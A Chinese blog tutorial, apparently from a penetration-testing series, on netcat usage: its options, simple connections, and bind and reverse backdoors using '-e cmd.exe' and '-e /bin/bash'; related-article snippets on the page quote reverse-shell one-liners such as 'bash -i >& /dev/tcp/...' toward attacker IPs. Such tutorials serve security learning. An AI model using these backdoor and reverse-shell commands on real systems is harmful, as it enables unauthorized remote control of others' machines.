netcat使用及反弹shell

最新推荐文章于 2024-08-14 10:39:59 发布
最新推荐文章于 2024-08-14 10:39:59 发布
阅读量5.2k 收藏 14
点赞数 2
分类专栏: 渗透工具使用 文章标签: 服务器 网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43623271/article/details/123011003
版权
本文详细介绍了NetCat在网络中的多种用途,包括参数解析、建立服务器和客户端连接、创建反弹shell、文件传输、端口扫描、Banner信息抓取以及端口转发等。在Windows和Linux环境下,讲解了不同类型的后门制作方法,强调了NetCat在网络安全和渗透测试中的重要性。
摘要由CSDN通过智能技术生成

NetCat

Netcat是一款非常出名的网络工具,简称“NC”,有渗透测试中的“瑞士军刀”之称。它可以用作端口监听、端口扫描、远程文件传输、还可以实现远程shell等功能。总之功能强大,可以用一句较为风趣的话来描述NC的强大——“你的想象力是局限NC的瓶颈”。

参数

-g <网关> 设置路由器跃程通信网关,最多可设置8个;
-G <指向器数目> 设置来源路由指向器,其数值为4的倍数;
-i <延迟秒数> 设置时间间隔,以便传送信息及扫描通信端口;
-l 使用监听模式,管控传入的资料;

-L 使用监听模式,客户端失去连接,服务器依然保持监听(低版本没有)

-n 直接使用IP地址,而不通过域名服务器;
-o <输出文件> 指定文件名称,把往来传输的数据以16进制字码倾倒成该文件保存
-p <通信端口> 设置本地主机使用的通信端口;
-r 乱数指定本地与远端主机的通信端口;
-s <来源位址> 设置本地主机送出数据包的IP地址;隐藏自己
-u 使用UDP传输协议;
-v 显示指令执行过程;
-w <超时秒数> 设置等待连线的时间;
-z 使用0输入\输出模式,只在扫描通信端口时使用。

-d nc命令在后台执行(退出cmd窗口仍在执行,nc1.11以上版本才有)

-e 执行某个程序,常用于后门建立(有的版本为了安全删除这个选项)

简单通讯

创建一个服务器端

nc -l -p port

在这里插入图片描述

创建一个客户端

nc target_ip target_port -w3

-w3设置等待连线的时间3s,防止未连接上服务器的“假死”现象

在这里插入图片描述

返回shell使用(建立后门)

windows

监听型后门

服务器

nc -l -p port -e cmd.exe    #被连接上会返回一个shell

在这里插入图片描述

客户端

nc target_ip target_port

在这里插入图片描述

连接型后门

服务器

nc -l -p 4444

客户端

我这里使用nc连接不上服务器,要用nc64

nc64 target_ip target_port -e cmd.exe

在这里插入图片描述

在这里插入图片描述

linux

监听型后门
nc -l -p 4444 -e \bin\bash

在这里插入图片描述

最低0.47元/天 解锁文章
活着Viva
关注
  • 2
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(五)之 Netcat反弹Shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-24 775
Netcat简称NC,是一个简单、可靠的网络工具,被誉为网络界的瑞士军刀。通NC可以进行端口扫描、反弹Shell、端口监听和文件传输等操作
Linux下NC反弹shell命令(推荐)
09-15
本篇文章将详细介绍如何在Linux使用`nc`进行反弹Shell操作,并提供其他编程语言的反弹Shell命令作为参考。 首先,攻击者需要在自己的机器上启动一个监听服务来接收目标机器的连接。这通常通过以下`nc`命令完成: ...
Netcat 的反向连接与反弹 Shell
Kali与编程
02-17 1126
在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。在反向连接中,攻击者首先在自己的主机上启动一个监听程序,然后在目标主机上执行一个连接程序,该连接程序会连接到攻击者主机上的监听程序,并建立一个反向连接。假设我们要在目标主机上执行一个连接程序,连接到攻击者主机的IP地址为192.168.1.100,端口号为1234的监听程序,并执行一个shell。在目标主机上执行连接程序,并连接到攻击者主机的监听程序。
反弹shell常见方法总结
qq_45746681的博客
10-08 745
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一.Bash反弹二.telnet反弹三.nc反弹四.常见脚本反弹: 前言 记录并总结下常用到的各种反弹shell的姿势,方便以后使用 环境:攻击机:windows,192.168.0.105 服务器:kail,192.168.0.107 一.Bash反弹 首先在攻击机上执行 nc -lvvp 3333 进行监听 在kail机上执行 bash -i >& /dev/tcp/192.168.0.105/3333
反弹shell的方法和场景
weixin_45653478的博客
04-01 1390
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe windows机器nc64.exe -lvvp 1111 -e /bin/bash linux机器。
【工具】Netcat(2)反弹shell
爱美食的Geek
02-21 2952
应用场景:某些拿到服务器权限之后,想要设置一个反弹shell。但是目标服务器上没有安装Netcat时。 1.反弹shell(bash) 反弹shell命令:bash -i >& /dev/tcp/ip/port 0>&1 pc接受netcat命令:nc -lvp port bash -i表示以交互模式运行bash shell。重定向符>&,如果在其后加文...
提权(2), Netcat反弹shell
探测???
12-03 281
Netcat(nc)是一款网络工具,也被称为“瑞士军刀”,可以读写TCP或UDP网络连接,透过使用TCP或UDP协议的网络连接去读写数据.它被设计成一个稳定的后门工具,能够直接由其它程序和脚本轻松驱动。同时,它也是一个功能强大的网络调试和探测工具,它能够建立你需要的几乎所有类型的网络连接Netcat可以用于端口探测、传输文本信息、传输文件/目录、远程电子取证信息收集、远程控制等常用操作。
netcat反弹shell
qq_56414082的博客
08-11 290
在执行命令漏洞,一般的利用漏洞是执行反弹shell在进行其他操作。执行反弹shell的命令有许多。反弹shell因为是受害者,反向连接远程服务器,请求是内部到外部,所以防火墙是不会进行拦截的。
cmd反弹shell提权
10-24
根据原文描述,作者在面对账号被删除的情况下,尝试了UDF提权方法未果后,转而使用了cmd反弹shell的方式进行提权。具体步骤如下: 1. **环境准备**:作者已经拥有了对目标服务器的低权限访问。 2. **工具准备**:...
反弹shell1
08-03
在TCP反弹Shell中,攻击者首先在本地用`nc(netcat)`命令监听一个端口,如443端口,`nc -lvp 443`。然后在目标机器上,使用各种方法创建一个连接到攻击者IP和端口的Shell,例如: - 使用`awk`命令创建TCP连接并...
32+64位socat,Android版,arm+arm64,android手机可用,android反向shell工具
04-16
其功能与有瑞士军刀之称的 Netcat 类似,可以看做是 Netcat 的加强版。 Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE、EXEC、System、Open、Proxy、...
netcat得到root权限
01-20
1. 反弹Shell:描述中提到的“可反弹shell”是指攻击者通过网络连接远程控制受害者的机器。当攻击者在目标系统上成功创建一个反向Shell时,受害者机器上的Netcat会监听特定端口,并将接收到的命令传递给操作系统...
反弹Shell,看这一篇就够了
Appleteachers的博客
04-24 1187
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
常用反弹 shell 方式总结
未完成的歌~的博客
03-07 5595
反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。
windows反弹shell复现
热门推荐
就是我的博客
04-06 1万+
windows反弹shell 简介: reverse shell反弹shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell类似,本质上是网络概念的客户端与服务端的角色反转,就是让目标机执行反向连接攻击机。 在实战中多配置命令执行等漏洞进行使用。 环境: 攻击机:IP为192.168.1.111,系统信息 Linux kali 5.10.0-kali3-amd6...
netcatshell反弹测试
HideInTime的博客
04-21 422
什么是反弹shell?   反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。 举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,
各种反弹shell方式
m0_58606546的博客
11-17 2302
1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: 1 bash -i >& /dev/tcp/121.40.248.82/1234 0>&1 1 /bin/bash -i > /dev/tcp/121.40.248.82/1234 0<& 2>&1 1 exec 5<>/dev/tcp/10.10.10.11/443;ca.
服务器数据恢复—raid5阵列热备盘未全部启用导致阵列崩溃的数据恢复案例
最新发布
beiya123的博客
08-14 356
服务器存储数据恢复环境: 一台EMC某型号存储中有一组RAID5磁盘阵列。该raid5阵列中有12块硬盘,其中2块硬盘为热备盘。 服务器存储故障: 该存储raid5阵列中有两块硬盘离线,只有1块热备盘启用替换掉其中一块离线盘,另外1块热备盘未成功启用,raid5阵列崩溃,存储不可用。 磁盘阵列中硬盘离线的原因通常是磁盘存在物理故障或者硬盘出现坏道。由于EMC存储中的raid控制器的磁盘检查策略十分严格,经常将硬盘的性能不稳定判定为硬件故障并将该硬盘踢出raid。
什么是反弹shell?如何使用反弹shell
10-30
反弹 Shell 是一种远程控制技术,它可以在目标主机上启动一个 Shell,并将其连接回攻击者的主机,从而使攻击者可以在目标主机上执行命令和操作。使用反弹 Shell 可以在某些场景下方便地进行远程控制,例如在没有直接访问目标主机的权限时。反弹 Shell使用方法有很多种,其中一种常见的方法是使用 nc(netcat)工具,具体步骤如下: 1. 在攻击者主机上启动 nc 监听一个端口,例如:nc -lvp 4444 2. 在目标主机上执行反弹 Shell 命令,例如:bash -i >& /dev/tcp/攻击者IP/4444 0>&1 3. 在攻击者主机上就可以通过 nc 连接到目标主机的 Shell,例如:nc 目标主机IP 4444 除了使用 nc 工具,还可以使用其他工具或编写脚本来实现反弹 Shell
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值